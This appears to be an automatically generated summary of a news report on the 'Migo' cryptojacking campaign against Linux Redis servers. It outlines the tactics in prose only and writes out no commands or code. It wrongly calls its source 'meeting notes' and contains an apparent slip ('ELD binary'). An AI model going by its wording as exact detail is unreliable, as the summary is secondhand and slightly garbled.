February 20, 2024 at 02:44PM
Researchers discovered a new malware campaign targeting Linux-based Redis servers, using a piece of malware called ‘Migo’ to mine for cryptocurrency. Migo disables key security features of Redis, allowing attackers to run cryptojacking activities. It also establishes persistence for a Monero miner, uses a rootkit for concealment, and manipulates system settings.
Based on the provided meeting notes, the key takeaways are:
1. A new malware strain named ‘Migo’ targets Linux-based Redis servers to mine for cryptocurrency. It uses system-weakening commands to turn off Redis security features, enabling cryptojacking activities to continue for extended periods.
2. The ‘Migo’ campaign was observed by analysts at Cado Security, who noticed attackers disabling critical security features on exposed Redis servers using CLI commands, allowing for remote execution of malicious commands and making replicas writable.
3. The attackers set up a cron job to download a script from Pastebin, retrieving ‘Migo’s’ primary payload and launching a modified XMRig (Monero) miner on the compromised endpoint through a UPX-packed ELD binary compiled in Go.
4. ‘Migo’ employs a user-mode rootkit to hide its processes and files, modifies system behavior in ways that complicate detection and performs multiple actions to evade detection, including setting up firewall rules, disabling SELinux, and manipulating system files to prevent communication with cloud service providers.
5. The attack demonstrates a strong understanding of the Redis environment and operations, with the potential for the threat actor to deliver more dangerous payloads beyond cryptojacking.
The threat actor’s detailed understanding of the Redis environment and their ability to avoid detection and manipulate system resources raises concerns about potential future attacks beyond cryptojacking.